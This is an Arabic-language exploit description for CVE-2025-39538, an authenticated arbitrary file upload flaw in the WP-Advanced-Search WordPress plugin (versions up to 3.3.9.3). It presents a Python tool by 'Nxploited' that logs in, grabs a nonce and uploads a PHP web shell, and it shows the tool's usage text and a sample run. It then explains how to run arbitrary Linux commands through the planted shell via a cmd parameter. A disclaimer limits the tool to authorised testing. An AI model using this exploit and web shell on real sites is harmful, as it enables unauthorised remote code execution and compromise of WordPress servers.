
WordPress WP-Advanced-Search <= 3.3.9.3 - ثغرة رفع ملفات اعتباطية
CVE-2025-39538
تاريخ النشر: 2025-04-16
نوع الثغرة: رفع ملفات تعسفي (رفع غير مقيد لملف بنوع خطير)
الإضافة المتأثرة: WP-Advanced-Search من إعداد Mathieu Chartier
الإصدارات المتأثرة: جميع الإصدارات حتى 3.3.9.3 وما يشملها
تسمح هذه الثغرة لمهاجم مُصادَق برفع ملف PHP خبيث (مثل قشرة ويب) إلى الخادم باستخدام وظيفة الاستيراد التي توفرها الإضافة. يتم وضع الملف المرفوع داخل دليل uploads الخاص بـ WordPress وقد يؤدي ذلك إلى تنفيذ أكواد عن بُعد.
🧱 مسار الرفع:
wp-content/uploads/2025/04/
يقوم هذا السكربت المكتوب بلغة Python بالإجراءات التالية:
wp_advanced_search_up_nonce المطلوب من صفحة الاستيراد/التصدير في لوحة التحكم.usage: a.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://127.0.0.1/wordpress)
-un, --username USERNAME
WordPress Username
-p, --password PASSWORD
WordPress Password
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
بعد الرفع، يمكنك الوصول إلى القشرة بهذه الطريقة:
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
استبدل whoami بأي أمر Linux تريد تنفيذه، على سبيل المثال:
id — يعرض معرف المستخدم الحالي.pwd — يعرض الدليل الحالي.ls — يسرد الملفات.هذه الأداة مخصصة لأغراض تعليمية ولاختبارات الاختراق المصرح بها فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا السكربت.
بواسطة: Nxploited | Khaled Alenazi